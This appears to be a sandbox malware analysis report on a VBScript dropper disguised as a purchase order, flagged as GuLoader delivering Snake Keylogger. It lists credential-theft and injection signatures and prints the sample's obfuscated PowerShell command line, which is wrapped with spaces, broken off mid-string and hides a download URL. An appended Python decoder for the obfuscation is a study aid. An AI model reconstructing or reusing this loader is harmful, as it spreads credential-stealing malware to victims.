Analysis Report
Distribuciones Enelca Ja#U00e9n, S.L. PEDIDO 456799.vbs
Overview
General Information
Sample name: | Distribuciones Enelca Ja#U00e9n, S.L. PEDIDO 456799.vbs (renamed because original name is a hash value) |
Original sample name: | Distribuciones Enelca Jaén, S.L. PEDIDO 456799.vbs |
Analysis ID: | 1540334 |
MD5: | 3f13eef87515d70fbdfedc6de7b6efc4 |
SHA1: | 8d2394c2e4daada6b8d9af1b60d8d11130ac1845 |
SHA256: | a2ef6e1f58a00b5d6523987df95a7ffc052a89470f97cd228a14fbccff113237 |
Tags: | vbs, user-abuse_ch |
Detection
GuLoader, Snake Keylogger
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Early bird code injection technique detected
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected Snake Keylogger
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Queues an APC in another process (thread injection)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Msiexec Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match
Classification
- System is w10x64
- wscript.exe (PID: 7792 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Distribuciones Enelca Ja#U00e9n, S.L. PEDIDO 456799.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
  - powershell.exe (PID: 7924 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" " <#Ilks K apelmester Macrograp hic Irena Miseres Ap pendices L arcenic #> ;$Hogward1 94='Halskd ens';<#Tvt ningernes Sporendes Cortin #>; $Nonputtin g=$Reorche strate+$ho st.UI; fun ction Roos ting($Uncr ystalled){ If ($Nonpu tting) {$G eneriske++ ;}$Getid=$ Kommunikat ionsformen +$Uncrysta lled.'Leng th'-$Gener iske; for( $Pseudoem otional=5; $Pseudoemo tional -lt $Getid;$P seudoemoti onal+=6){$ Mandaars=$ Pseudoemot ional;$Ule mpevilkaar ene122+=$U ncrystalle d[$Pseudoe motional]; $klynkene= 'Xanthippe rne';}$Ule mpevilkaar ene122;}fu nction Out sprint($Ps eudoemotio nalncestuo us8){ . ($ Nonsubtili ty) ($Pseu doemotiona lncestuous 8);}$Lame= Roosting ' fresMSig loSel gzPo dodiVoltal KnaldlPlad saSenne/As tas ';$Lam e+=Roostin g 'Taarn5G auge. Crab 0Brneh Ino b(Raps WKo mediCulven HumpldSkip po NonrwLa ur sTakst Dks lNQuay TApost Ha and1Sec n0 ,ykm.Bri, a0Vejbr;ha ckw TrykfW reskoi,out rn Pria6No n o4H pot; Pt,ry ther ox Darl6Re ar4 tu,i; redi Pejl ir istyvTy pis:Omste1 Maall3Uhla n1 Flu..Su bsi0,arde) S lvc Apof eGEksore S amtcGrundk WinecoRet r/O tje2Re qu 0S,rap1 Phen0.lle l0Wa li1La cca0Udsag1 skyt, Dobb eFBr ndiVa ndsrtamtae ForegfProt eoSjuskxGl ass/Lgkno1 Dives3Hild i1emalj.Ta ile0O phy ';$Skibspr ovianterin gens=Roost ing ' Stat U UltrsUds uge FinaR Akro-Alkoh AAcolygAsy lbeIreniNh eftetsec,r ';$Discan onize=Roos ting 'sule mh RetstPl adetHyperp Brow,sBluf r:Atrsg/Di met/ Syn,d Bistrr Elg tiTvedevDr eneeElorg. Smughg Spo oWeb uoOo riagStorml ColleeUpbr a. 
OmorcN namoMfikkm Im er/came mu remicOp erc?Udkmpe Dyne xN.nr ap oceloTr a,srWreatt R.esu= ude dDagbaoInd snwRomannF odbolAelu oRecuraNgt fldLe le&S y taiFremk dUnsac= .r ig1 Hastq oppo2Kerne SVari NB y sk6DashedA blew6Fleks s nforfPop ulcAnthrOM on iENitr, eKa.enx,re enGTrope1S e ar9.lank WBjelia Eu phNSams,LD finkMis t wBiddeATel e,tProdutC orke4 ejld XRa et_Ant irkGruttCA delsyOphth ';$Elysis k57=Roosti ng 'Ou ha> Se is ';$N onsubtilit y=Roosting 'LibysiFo ruETactaX Histo ';$U ncapitaliz eds='Budce ntralens'; $Markedsun dersgelser ='\Bindehi ndens.Stu' ;Outsprint (Roosting 'Tu ul$I stigAfrohl lsgngOFavo ,BSuperaP otelOma d: .yvebSlib eA Whisgan tihM TolvA ulivsN edv iDSmaareDi spaN.nderS oxyty= Ste d$KolleEAp o eNSandpv Rdli:Vido vAPallep K ellpChartd HotheAadde tphalaaOp hol+Beaum$ Ov remDeci mA S emrQu attKFrokoE UncopDNonb is FimsUSo ljeNFantad Pu keePatt eRSklmeS r ed,GSy dee SkabeLLreb rSBecl,ePr darKnop ' );Outsprin t (Roostin g ' p nd$e utonGUro l l Cit OHyp odb RegnAA kkusL aski : rissaRve grcActsbhB mboEselvi nBouldILis seAInsurLD roll=Chefp $haem D ol oIValyls S idcSpindA rounNSand bO Radin B
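The PowerShell stage in the process tree above hides every string it needs (user agent, header name, download URL, the cmdlet name it invokes) by interleaving the real characters with dictionary-word filler: the helper the script calls Roosting walks each literal from index 5 in steps of 6 and keeps only the characters it lands on, and Outsprint hands a decoded string to whatever command name $Nonsubtility decodes to. The Python decoder below is an added example, not part of the report or of the sample. It reproduces that stride (start 5, step 6 and the Length-1 bound are all read off the visible code) and walks a script for plain assignments, += accumulation and runner calls. The stage it decodes is a constructed fixture: the helper and variable names are the ones visible on the page, but the literals and the text they decode to are my own and are not a decode of the page's literals (the report's column wrapping inserted spaces into the real literals, so they cannot be decoded reliably from this page).

```python
import re
from typing import NamedTuple

# Stride parameters read off the page's PowerShell stage: the helper the sample
# calls Roosting starts at $Pseudoemotional=5 and advances by 6 each round,
# appending $Uncrystalled[$Pseudoemotional] to the result.
STRIDE_START = 5
STRIDE_STEP = 6


def stride_decode(s: str, start: int = STRIDE_START, step: int = STRIDE_STEP) -> str:
    """Reproduce the sample's every-6th-character extraction.

    The loop bound is $Kommunikationsformen + Length - $Generiske. Neither
    variable is assigned in the visible code, but $Generiske++ runs whenever
    $host.UI is non-null (always, under powershell.exe), so the bound is
    Length - 1 with a strict less-than: a payload character sitting on the last
    index of a literal is never copied, which is why each literal in the sample
    ends with filler.
    """
    limit = len(s) - 1
    return "".join(s[i] for i in range(start, limit, step))


class DecodedStage(NamedTuple):
    variables: dict  # name -> assembled plaintext (honours both = and +=)
    executed: list   # plaintext handed to the runner (Outsprint, i.e. ". iex")
    loose: list      # helper calls that are neither assigned nor executed


def decode_stage(script: str, helper: str = "Roosting",
                 runner: str = "Outsprint") -> DecodedStage:
    """Walk every helper call in source order and rebuild what it produces."""
    # PowerShell single-quoted literal; a doubled quote is the only escape.
    literal = r"'(?P<lit>(?:[^']|'')*)'"
    token_re = re.compile(
        rf"(?:\$(?P<var>\w+)\s*(?P<op>\+?=)\s*|(?P<run>{re.escape(runner)})\s*\(\s*)?"
        rf"{re.escape(helper)}\s+{literal}"
    )
    variables, executed, loose = {}, [], []
    for m in token_re.finditer(script):
        plain = stride_decode(m.group("lit").replace("''", "'"))
        if m.group("var"):
            prefix = variables.get(m.group("var"), "") if m.group("op") == "+=" else ""
            variables[m.group("var")] = prefix + plain
        elif m.group("run"):
            executed.append(plain)
        else:
            loose.append(plain)
    return DecodedStage(variables, executed, loose)


# Constructed fixture laid out like the page's stage. Helper and variable names
# are those visible in the report; the literals and their plaintext are mine
# and are NOT a decode of the page's literals.
SAMPLE_STAGE = r"""<#Ilks Kapelmester #>;$Nonsubtility=Roosting 'LibysiForumeTactaxHisto';
$Lame=Roosting 'GlassMTaarnoKvistzPla,siSne llVinkllHosteaGrund/Aske';
$Lame+=Roosting 'Taarn5Gauge.Brnd 0Ost';
$Skibsprovianteringens=Roosting 'KlokkUBrndesFjeldeSmukkrVrdig-HjortALykkegMrketeSldtenBjrnetAften';
$Klynkene=Roosting 'HaandiVindetGrund''FjeldsX';
Outsprint (Roosting 'Afrik$SlibeaVinde=Mande1Ryk');
"""


if __name__ == "__main__":
    stage = decode_stage(SAMPLE_STAGE)
    for name, value in stage.variables.items():
        print(f"${name} = {value!r}")
    for value in stage.executed:
        print(f"executed: {value!r}")
```

On a real sample, feed the decoder the exact command line (from the sandbox's raw data, a Sysmon event 1 or a PowerShell 4104 script-block log) rather than text copied from a rendered report: any whitespace inserted by layout shifts the stride and turns the output into noise. The `+=` handling matters because the sample assembles long values such as the user agent from several short literals.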